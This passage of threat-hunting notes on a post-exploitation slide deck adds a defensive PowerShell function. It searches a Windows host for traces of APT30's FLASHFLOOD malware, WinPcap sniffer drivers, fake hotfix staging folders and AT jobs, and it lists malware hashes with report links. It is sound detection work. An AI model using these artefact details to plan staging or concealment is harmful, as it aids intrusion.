  ▫ OPSEC is rarely perfect, hunt for trace evidence
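For the "go find the trace" point on page 47, an added example (my own, not from the deck) that checks one host for the artefacts the earlier sections would leave behind: the npf service and loose WinPcap DLLs from page 42, the fake $NtUninstall...$ staging directory from page 37, fresh uncompressed wav files from page 27, and the AT jobs from the APT30 quote on page 41. The locations follow the slides; the 7045 event text and the Tasks\At*.job naming are Windows behaviour I am relying on, not page content.

```powershell
# Added example, not from the deck: hunt for the traces the post-ex techniques above leave on a host.
function Find-PostExTraces {
    param([int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)
    $sys32 = Join-Path $env:WINDIR 'System32'
    $hits = New-Object System.Collections.Generic.List[object]
    function Add-Hit([string]$Kind, [string]$Detail) { $hits.Add([pscustomobject]@{ Kind = $Kind; Detail = $Detail }) }

    # Page 42: WinPcap dropped outside an installer - npf service plus loose DLLs in System32
    $npf = Get-Service -Name npf -ErrorAction SilentlyContinue
    if ($npf) { Add-Hit 'npf-service' "npf service present, status $($npf.Status)" }
    foreach ($f in 'drivers\npf.sys','packet.dll','wpcap.dll','pthreadVC.dll') {
        $p = Join-Path $sys32 $f
        if (Test-Path $p) { Add-Hit 'winpcap-file' "$p (written $((Get-Item $p).LastWriteTime))" }
    }
    # Any kernel-driver service creation is logged by the Service Control Manager as System event 7045
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'kernel mode driver' } |
        ForEach-Object { Add-Hit 'driver-service-7045' (($_.Message -split "`n") -join ' ' -replace '\s+', ' ') }

    # Page 37: FLASHFLOOD staged its bundle under a fake $NtUninstallKB...$ hotfix folder
    Get-ChildItem -Path $env:WINDIR -Directory -Filter '$NtUninstall*$' -ErrorAction SilentlyContinue |
        Where-Object { Test-Path (Join-Path $_.FullName 'FlashFiles') } |
        ForEach-Object { Add-Hit 'flashflood-stage' $_.FullName }

    # Page 27: the MCI recorder writes an uncompressed wav; fresh wavs under Temp or AppData are unusual
    Get-ChildItem -Path $env:TEMP, $env:APPDATA -Recurse -Filter '*.wav' -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt $since } |
        ForEach-Object { Add-Hit 'recent-wav' "$($_.FullName) ($($_.Length) bytes)" }

    # Page 41: APT30 ran its sniffer through remote AT jobs; the legacy scheduler keeps them as Tasks\At*.job
    Get-ChildItem -Path (Join-Path $env:WINDIR 'Tasks') -Filter 'At*.job' -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Hit 'at-job' "$($_.FullName) (written $($_.LastWriteTime))" }

    $hits
}
# Find-PostExTraces -Days 14 | Format-Table -AutoSize
```

Run it per host from a remoting session and compare the result against a baseline; every check here is a cheap file, service or event lookup, which is the "defend the current-gen" point of page 46 before reaching for next-gen tooling.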

Page 49: Malware References

◦ RocketKitten - MPK Shell
  ▫ SHA1: eb6a21585899e702fc23b290d449af846123845f
  ▫ https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

Page 51: Malware References

◦ Naikon APT (AKA APT30) FLASHFLOOD Malware
  ▫ SHA1: cfa438449715b61bffa20130df8af778ef011e15
  ▫ Two good references:
    https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf
    https://securelist.com/analysis/publications/69953/the-naikon-apt/